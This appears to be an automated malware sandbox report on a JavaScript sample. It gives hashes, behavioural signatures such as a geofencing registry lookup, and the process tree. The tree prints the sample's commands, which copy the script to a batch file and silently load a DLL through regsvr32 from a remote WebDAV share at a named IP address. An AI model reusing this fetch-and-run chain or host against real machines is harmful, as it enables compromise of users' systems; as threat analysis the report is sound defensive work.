Analysis
-
max time kernel
125s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 00:56
Static task
static1
Behavioral task
behavioral1
Sample
7989242762876926607.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
7989242762876926607.js
Resource
win10v2004-20240704-en
General
-
Target
7989242762876926607.js
-
Size
5KB
-
MD5
c1884f56cb4dbae6f7c395f20b582fda
-
SHA1
c3ad7c116c56c68f39362f5dd37f021497bef6be
-
SHA256
d8ab4102f62ed6debdc1c9f9e5a6733b6f08bc065ac6ccc0cdc152c93b81f24e
-
SHA512
8c048b3336d03367517fea722b8461783547af0a39fb279d7e29a39dc1e767b8ecc6a24335d8bc3810f7774c667548032c1bd07470e85c41352daaa37c941fb1
-
SSDEEP
96:Vfh2Xh6NTy4gzk4ggYmi1leUIFNM/d9IjzuCGUfL9UkY:VYxx3kMDi1QZFNWdSjzuC9L9UkY
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2272 wrote to memory of 4860 2272 wscript.exe 89 PID 2272 wrote to memory of 4860 2272 wscript.exe 89 PID 4860 wrote to memory of 1052 4860 cmd.exe 92 PID 4860 wrote to memory of 1052 4860 cmd.exe 92 PID 4860 wrote to memory of 2984 4860 cmd.exe 93 PID 4860 wrote to memory of 2984 4860 cmd.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7989242762876926607.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\7989242762876926607.js" "C:\Users\Admin\\rgggul.bat" && "C:\Users\Admin\\rgggul.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:1052
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\502.dll3⤵PID:2984
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4268,i,3409420486566309625,12100452682816721435,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:81⤵PID:2028
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5c1884f56cb4dbae6f7c395f20b582fda
SHA1c3ad7c116c56c68f39362f5dd37f021497bef6be
SHA256d8ab4102f62ed6debdc1c9f9e5a6733b6f08bc065ac6ccc0cdc152c93b81f24e
SHA5128c048b3336d03367517fea722b8461783547af0a39fb279d7e29a39dc1e767b8ecc6a24335d8bc3810f7774c667548032c1bd07470e85c41352daaa37c941fb1